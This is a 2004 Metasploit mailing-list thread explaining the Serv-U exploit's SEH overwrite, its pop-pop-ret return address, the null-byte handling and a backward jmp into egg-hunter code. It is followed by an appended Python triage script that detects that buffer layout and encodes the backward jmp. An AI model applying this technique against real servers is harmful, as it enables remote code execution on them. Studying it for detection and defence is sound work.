Metasploit mailing list archives
question about the return addr of the serv-u exploit
From: ninjatools at hush.com (ninjatools at hush.com)
Date: Fri, 9 Apr 2004 12:09:31 -0700
Yeah, so you overwrite the SEH, which then jmps to a pop pop ret. The addr you listed hits a pop pop ret and xor eax, eax pop pop ret (depending on version), I believe... After the pop pop ret, we are at the dword before the SEH address we overwrote. So it goes something like: [stuff][4 bytes of code][0x00401877], and then you land in the 4 bytes of code. I then jmp backwards from the 4 bytes into stuff, which is the searcher code that finds the rest of the payload, which was specified as the filename of the chmod command. It stops writing at the "\x00" in "\x77\x18\x40\x00", and then the string function cuts the buffer and null terminates it for us. That should be pretty much it.

You can see the search code in Pex::Searcher, and the JmpShort code in Pex::x86 that does the jmp instruction on the fly based on the size of Pex::Searcher (so there are no nops, everything is absolute). There are some other tricks... exercise for the reader? ;)

Oh yeah, and hey mailing list people :)

-spoon
I'm wondering whether you can use the return addr 0x00401877 for the Serv-U exploit. I have tested it with the framework and it works great, but I once coded my own exploit, and when I use this offset there it doesn't work because of the null byte. I attached Olly to the process and I can see that at the beginning there is 0x00401877 in memory, but the Serv-U process passes through some functions and then the NULL byte is suddenly 0xeb. Do you know any trick? I hope I can get an answer; it will save me a lot of debugging effort.
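The layout spoon describes, as an added triage example (not code from this thread or from the Metasploit framework): given a captured command argument, it checks for the [stuff][4 bytes of code][0x00401877] shape, confirms the 4-byte slot holds a short backward jmp, and reports where that jmp lands. The sample buffer is constructed; its filler bytes only stand in for the searcher code, and the small encoder reproduces the on-the-fly displacement computation the post attributes to Pex::x86.

```python
import struct
from typing import Optional

# Shape from the thread: [stuff][4 bytes of code][handler address]. The
# handler 0x00401877 is little-endian "\x77\x18\x40\x00"; its top null byte is
# what the victim's string function turns into the terminator.
HANDLER = 0x00401877


def triage_seh_layout(arg: bytes, handler: int = HANDLER) -> Optional[dict]:
    """Return a description of the layout if `arg` matches it, else None.
    The trailing null is optional on the wire: only the three non-null
    address bytes have to be present at the very end of the argument."""
    addr = struct.pack("<I", handler)
    if addr[-1] != 0:
        raise ValueError("check assumes the handler's top byte is null")
    body = arg[:-1] if arg.endswith(b"\x00") else arg
    if not body.endswith(addr[:-1]):
        return None
    code_end = len(body) - 3          # where the handler address begins
    code_start = code_end - 4         # the 4-byte slot execution lands in
    if code_start < 0:
        return None
    slot = body[code_start:code_end]
    if slot[0] != 0xEB:               # jmp short rel8
        return None
    disp = struct.unpack("<b", slot[1:2])[0]
    target = code_start + 2 + disp    # rel8 counts from the next instruction
    if disp >= 0 or target < 0:
        return None                   # not a backward jump into "stuff"
    return {"searcher_len": code_start, "jmp_disp": disp,
            "lands_at": target, "null_on_wire": arg.endswith(b"\x00")}


def jmp_short_back(distance: int) -> bytes:
    """Encode a 2-byte short jmp landing `distance` bytes before the jmp
    itself; the searcher's size decides the distance, so no nops needed."""
    disp = -(distance + 2)
    if not -128 <= disp <= -1:
        raise ValueError("distance out of rel8 range")
    return b"\xeb" + struct.pack("<b", disp)


# Constructed sample (no real searcher code): 40 filler bytes stand in for
# the searcher, the jmp slot is padded to 4 bytes with two never-executed
# filler bytes, then the three non-null address bytes end the argument.
SEARCHER_LEN = 40
SAMPLE = (b"S" * SEARCHER_LEN
          + jmp_short_back(SEARCHER_LEN) + b"\x90\x90"
          + b"\x77\x18\x40")
```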